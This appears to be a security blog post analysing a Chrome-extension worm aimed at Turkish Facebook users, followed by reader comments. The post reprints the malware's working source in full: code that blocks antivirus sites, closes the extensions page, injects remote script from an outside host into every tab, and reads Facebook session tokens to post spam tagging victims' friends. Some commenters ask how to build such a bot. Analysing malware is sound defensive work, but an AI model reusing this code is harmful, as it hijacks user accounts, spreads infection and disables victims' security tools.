videotr.in (Facebook spreading browser extension proxied by cloudflare)

This is aimed at Turkish Facebook users. The scripts used by the extension are hosted over several domains.

The infection starts with the site hxxp://www.videotr.in, which plays a short videoclip. The video is then interrupted and the user is urged to run an exe that is downloaded to fix the issue.


The exe creates a Chrome extension from files listed at hxxp://www.likef.biz/ask.txt and adds it to Chrome.

background.js
chrome.webRequest.onBeforeRequest.addListener(
        function (details) {
                var url = details.url;
                for (var i = 0; i < ibneler.length; i++) {
                        if (url.indexOf(ibneler[i]) > -1) {
                                return {
                                        cancel: true
                                };
                        }
                }
        }, {
                urls: ["<all_urls>"]
        }, ["blocking"]);
var ibneler = [
        'https://www.facebook.com/csp.php'
];
function Organik() {
        var xhr = new XMLHttpRequest();
        xhr.onreadystatechange = function () {
                if (xhr.readyState == 4) {
                        try {
                                JSON.parse(xhr.responseText).forEach(
                                        function (d) {
                                                if (d.uri) {
                                                        ibneler.push(d.uri);
                                                }
                                        });
                        } catch (e) {}
                }
        };
        xhr.open("GET",
                'http:\/\/www.upjs.net/ajax/get.js?amtasak=' +
                Math.random() * 999999, true);
        xhr.send();
}
Organik();
chrome.tabs.onUpdated.addListener(
        function (tabid, x, tab) {
                if (tab.url ==
                        'chrome://chrome/extensions' ||
                        tab.url == 'opera://extensions' ||
                        tab.url == 'chrome://extensions/'
                ) {
                        chrome.tabs.remove(tab.id);
                }
        });
chrome.tabs.onUpdated.addListener(function (tabId) {
        chrome.tabs.get(tabId, function (tab) {
                {
                        var xhr = new XMLHttpRequest();
                        xhr.onreadystatechange = function () {
                                if (xhr.readyState == 4) {
                                        if (tab.url.indexOf('devtools://') < 0) {
                                                chrome.tabs.executeScript(tab.id, {
                                                        code: xhr.responseText
                                                });
                                        }
                                }
                        }
                        xhr.open('GET', 'http://www.jsup.us/user.php');
                        xhr.send();
                }
        })
});
Script.js
if(!document.getElementById('amung')){
new Image().src = 'http://whos.amung.us/pingjs/?k=z8l4ub8fvjhz';
}

Background.js loads a list of domains from hxxp://www.upjs.net/ajax/get.js and blocks any attempt to visit them. It also blocks any attempt to open the Chrome extension page.

get.js
[{"uri":"virustotal.com"},{"uri":"avast.com"},{"uri":"eset.com"},{"uri":"microsoft.com"},{"uri":"virusscan.jotti.org"},{"uri":"jotti.org"},{"uri":"avg.com"},{"uri":"kaspersky.com.tr"},{"uri":"kaspersky.com"},{"uri":"facebook.com/ajax/webstorage/process_keys.php"},{"uri":"facebook.com/checkpoint/malware/cr_ext_config"},{"uri":"facebook.com/checkpoint/malware/cr_ext_log"},{"uri":"sansurcrx.com"},{"uri":"dl.dropboxusercontent.com"},{"uri":"sosyalmedyakusu.com"},{"uri":"fiddle.jshell.net"},{"uri":"fei-coder.com"},{"uri":"docs.google.com"},{"uri":"drive.google.com"},{"uri":"orjinalmarket.net"},{"uri":"facebook.com/ajax/follow/unfollow_profile.php"},{"uri":"vuupc.com"},{"uri":"mcafee.com"},{"uri":"s3.amazonaws.com"},{"uri":"googlecode.com"}]


Kaspersky.com blocked

Background.js also loads additional javascript from hxxp://www.jsup.us/user.php. This has the Facebook spreading component.

user.php
if (!document.getElementById("amung")) {
    new Image().src = "http://whos.amung.us/pingjs/?k=bcpn2gdh64no";
}
var tarih = new Date();
var takip = Array("1661944612", "1625224768");
for (i = 0; i = localStorage['Post_' + profile_id])) {
    function rndchr(n) {
        var text = "";
        var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
        for (var i = 0; i < n; i++) text += possible.charAt(Math.floor(Math.random() * possible.length));
        return text;
    }
    var u = ["Canli yayinda giyilecek elbisemi Allah askina bu! " + rndchr(1) + " ", " is gercekten iyice cigrindan cikti ne olacak boyle bilmiyorum!" + rndchr(1) + " ", "Bunlar da hakli hic bir yetenegi olmayan insanlar sonucta bunlar!" + rndchr(1) + " ", " Bunlari kontrol eden kurum RTUK! gor artik bunlar ve bi cozum uret!" + rndchr(1) + " ", "Valla bunlarda kisilik falan kalmamis kardesim" + rndchr(1) + " ", "Kardesim coluk cocugumuz var bunlar iyice bozdu!" + rndchr(1) + " ", "Birakin artik bu isleri bizler akillandik yemiyoruz bu numaralari!" + rndchr(1) + " ", "Ben izledim kendimden utandim. sizde bir bakin sunlara" + rndchr(1) + " ", "Yeter biktik beee! Biz boyle izlemek istemiyoruz!" + rndchr(1) + " ", "Yaa arkadaslar bunlari kontrol eden bir kurum yokmu! " + rndchr(1) + " ", "Reyting ugruna her gun neler goruyoruz vallahi yazik!" + rndchr(1) + " ", "Bizim orf adetlerimizle hic bagdasmayan seyler bunlar!" + rndchr(1) + " ", "D\xFCn\'den Beri Ugra\u015Ft\u0131g\u0131m tek \u015Eey bu Video \u0130zleyin.", "Mutlaka \u0130zleyin g\xFCnlerdir ugra\u015F\u0131orum.", "Videomu \u0130zleyen Herkeze Te\u015Fekk\xFCrler.", "En Sevdiğim Arkadaşlarım :)", "Ben Bu Videoyu yapmak i\xE7in g\xFCnlerimi verdim kimse izlemior.", "Yeni yılınız kutlu olsun arkadaşlar :) :D", "2013 y\u0131l\u0131nda arkada\u015Flar\u0131m ile ge\xE7irdi\u011Fim en g\xFCzel anlar", "Benim videomu birtek noal baba izlesin dilek diledim", "Simdide İnanmayinda Goreyim :)", "Herkez Cesaret Edemez ..", "İste Size Bahsettigim Sirrim :)", "Cok Utaniyorum Ama Birde Siz \u0130zleyin L\xFCtfen", "Ne Kadar Cilgin Bir İnsanim Ben.", "Nasilda Tatliyim Ama..", "Dostlarimin Destegi Olmasaydi Gidemezdim..", "Destek Veren Tum Dostlarimi Kutluyorum", "Yetenek Sizsiniz T\xFCrkiye\'ye Kat\u0131ld\u0131m. \u0130zlerseniz Sevinirim", "Bunu Yapacagım Aklima Gelmezdi :)", "Destek Veren T\xFCm Arkadaslarima Tesekk\xFCr Ederim", "Sonunda Bunuda Yaptim ya Helal Olsun Bana", "Kim Derdiki Televizyona Cikacagım ?", "Taniyanlar Ne Kadar Cilgin Oldugumu Bilir :)"];
    var rand = u[Math.floor(u.length * Math.random())];
    var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();

    function rastgele(uzunluk) {
        mtn = "ABCDEFGHIJKLMNOPRSTUVYZXabcdefghijklmnoprstuvyzx0123456789";
        ret = "";
        for (i = 0; i < uzunluk; i++) {
            ret += mtn[Math.floor(Math.random() * 57)];
        }
        return ret;
    }
    var link = "";
    var xhr = new XMLHttpRequest();
    xhr.open("GET", 'http://www.videotr.in/dropbox/up.php', true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState == 4) {
            link = xhr.responseText + "?" + rastgele(250);
            topla();
        }
    }
    xhr.send();

    function topla() {
        var get = new XMLHttpRequest();
        get.onreadystatechange = function () {
            if (get.readyState == 4) {
                var response = JSON.parse(get.responseText);
                var isim = response.name;
                online(isim);
            }
        };
        get.open("GET", "https://graph.facebook.com/" + profile_id, true);
        get.send();
    }
    friends = [];

    function online(isim) {
        var get = new XMLHttpRequest();
        get.onreadystatechange = function () {
            if (get.readyState == 4) {
                try {
                    var veri = JSON.parse(get.responseText.replace("for (;;);", ""));
                    var toplam = Object.keys(veri.payload.buddy_list.nowAvailableList).length;
                    for (kisi in veri.payload.buddy_list.nowAvailableList) {
                        friends.push({
                            id: kisi
                        });
                    }
                } catch (close) {}
                paylas(isim, friends)
            }
        };
        var params = "user=" + profile_id + "&fetch_mobile=false&__user=" + profile_id + "&__a=1&__req=2&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
        get.open("POST", "/ajax/chat/buddy_list.php?__a=1", true);
        get.send(params);
    }

    function paylas(isim, friends) {
        if (link != "undefined" || link != "") {
            var http = new XMLHttpRequest();
            http.onreadystatechange = function () {
                if (http.readyState == 4) {}
            };
            var params = "";
            params = "fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
            params += "&xhpc_context=home";
            params += "&xhpc_ismeta=1";
            params += "&xhpc_timeline=";
            params += "&xhpc_composerid=u_jsonp_3_3";
            params += "&xhpc_litestand=1";
            params += "&xhpc_targetid=" + profile_id;
            params += "&clp={\"cl_impid\":\"a4eb8ac2\",\"clearcounter\":0,\"elementid\":\"u_jsonp_3_g\",\"version\":\"x\",\"parent_fbid\":" + profile_id + "}";
            params += "&xhpc_message_text=" + rand;
            params += "&xhpc_message=" + rand;
            params += "&aktion=post";
            params += "&app_id=2309869772";
            params += "&attachment[params][urlInfo][canonical]=" + link;
            params += "&attachment[params][urlInfo][final]=" + link;
            params += "&attachment[params][urlInfo][user]=" + link;
            params += "&attachment[params][title]=" + isim + " :Yazıklar olsun izlerken içim gitti ya.";
            params += "&attachment[params][summary]=www.youtube.com";
            params += "&attachment[params][images][0]=https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-prn1/1525624_180057068859680_248847473_n.jpg";
            params += "&w=100";
            params += "&h=100";
            params += "&url=https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-prn1/1525624_180057068859680_248847473_n.jpg";
            params += "&cfs=1";
            params += "&upscale";
            params += "&attachment[params][medium]=106";
            params += "&attachment[params][url]=" + link;
            params += "&attachment[type]=100";
            params += "&link_metrics[source]=ShareStageExternal";
            params += "&link_metrics[domain]=youtube.com";
            params += "&link_metrics[base_domain]=youtube.com";
            params += "&link_metrics[title_len]=51";
            params += "&link_metrics[summary_len]=260";
            params += "&link_metrics[min_dimensions][0]=70";
            params += "&link_metrics[min_dimensions][1]=70";
            params += "&link_metrics[images_with_dimensions]=1";
            params += "&link_metrics[images_pending]=0";
            params += "&link_metrics[images_fetched]=0";
            params += "&link_metrics[image_dimensions][0]=325";
            params += "&link_metrics[image_dimensions][1]=325";
            params += "&link_metrics[images_selected]=1";
            params += "&link_metrics[images_considered]=1";
            params += "&link_metrics[images_cap]=10";
            params += "&link_metrics[images_type]=images_array";
            params += "&composer_metrics[best_image_w]=100";
            params += "&composer_metrics[best_image_h]=100";
            params += "&composer_metrics[image_selected]=0";
            params += "&composer_metrics[images_provided]=1";
            params += "&composer_metrics[images_loaded]=1";
            params += "&composer_metrics[images_shown]=1";
            params += "&composer_metrics[load_duration]=16";
            params += "&composer_metrics[timed_out]=0";
            params += "&composer_metrics[sort_order]=";
            params += "&composer_metrics[selector_type]=UIThumbPager_6";
            if (friends.length < 200) {
                limit = friends.length;
            } else {
                limit = 150;
            }
            for (i = 0; i < limit; i++) {
                params += '&composertags_with[' + i + ']=' + friends[i].id;
            }
            params += "&is_explicit_place=";
            params += "&composertags_place=";
            params += "&composertags_place_name=";
            params += "&tagger_session_id=1388007674";
            params += "&action_type_id[0]=";
            params += "&object_str[0]=";
            params += "&object_id[0]=";
            params += "&hide_object_attachment=0";
            params += "&og_suggestion_mechanism=";
            params += "&composertags_city=";
            params += "&disable_location_sharing=false";
            params += "&composer_predicted_city=114515998560505";
            params += "&audience[0][value]=80";
            params += "&nctr[_mod]=pagelet_composer";
            params += "&__user=" + profile_id;
            params += "&__a=1";
            params += "&__dyn=7n8a9EAMBlClUlgDxqiykUUxoshEK49oKiWFamiFo";
            params += "&__req=17";
            params += "&__rev=1058441";
            params += "&ttstamp=";
            http.open("POST", "/ajax/profile/composer.php", true);
            http.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            http.send(params);
        }
    }
    if (navigator.userAgent.indexOf("Chrome") > 0) {
        tarih.setTime(tarih.getTime() + 1000 * 10 * 10);
        localStorage['Post_' + profile_id] = tarih.getTime();
    }
}

Updated links for spreading are obtained from hxxp://www.videotr.in/dropbox/up.php

The shortened url leads to a page hosted on dropbox.
    

    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
    <head>
            <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
            <title></title>
    </head>
    <body>
    <script type="text/javascript">
    var a = navigator,
            b = "userAgent",
            c = "indexOf",
            f = "&m=1",
            g = "(^|&)m=",
            h = "?",
            i = "?m=1";
    if (-1 != a[b][c]("Mobile") && -1 != a[b][c]("WebKit") && -1 == a[b][c]("iPad") || -1 != a[b][c]("Opera Mini") || -1 != a[b][c]("IEMobile")) {
    top.location="http://goo.gl/wXXcpZ";
    }else{
    top.location = "http://www.videotr.in";
    }
    </script>
    </body>
    </html>


Mobile browsers are redirected to hxxp://mobiltrafikmt.s3.amazonaws.com/mobil.html and all others are sent to videotr.in for the infection cycle to start again.

mobil.html
<script src="http://code.jquery.com/jquery-latest.js" type="text/javascript"><!--mce:2--></script>
<script>
function detectmob() { 
 if( navigator.userAgent.match(/Android/i)){
    return "Android";
  }
  if( navigator.userAgent.match(/iPhone/i)){
    return "iPhone";
  }
}

$.get("http://ipinfo.io", function(response) {
    if(response.country=="TR")
    {
    //TÃœRKÄ°YE
    if(response.org.indexOf("TURKCELL")>0){
    top.location.href = 'turkcell.html';
    }else if(response.org.indexOf("Vodafone")>0){
    top.location.href = 'vodofone.html';
    }else if(response.org.indexOf("AVEA")>0){
    top.location.href = 'avea.html';
    }else{
    if(detectmob()=="Android"){
    top.location.href = 'androidwifi.html';
    }else if(detectmob()=="iPhone"){
    top.location.href = 'iphonewifi.html';
    }else{
    top.location.href = 'trweb.html';
    }
    }
    }else{
    //YURTDIÅžI
    if(detectmob()=="Android"){
    top.location.href = 'yurtdisi-anroid.html';
    }else if(detectmob()=="iPhone"){
    top.location.href = 'yurtdisi-ios.html';
    }else{
    top.location.href = 'yurtdisiweb.html';
    }
    }
}, "jsonp");
</script>
Mobile browsers are separated by phone OS and pushed through a network of affiliate links.

3 comments:

Hendrac7 said...

videotr.in is non aktif bro , can you explain again to make BOT like this ??? my email : hendrac7@gmail.com

Kodran Piraj said...

how to convert crx to exe please ?

Anonymous said...

what info does hxxp://www.videotr.in/dropbox/up.php contain? Does it serve a json file?

Post a Comment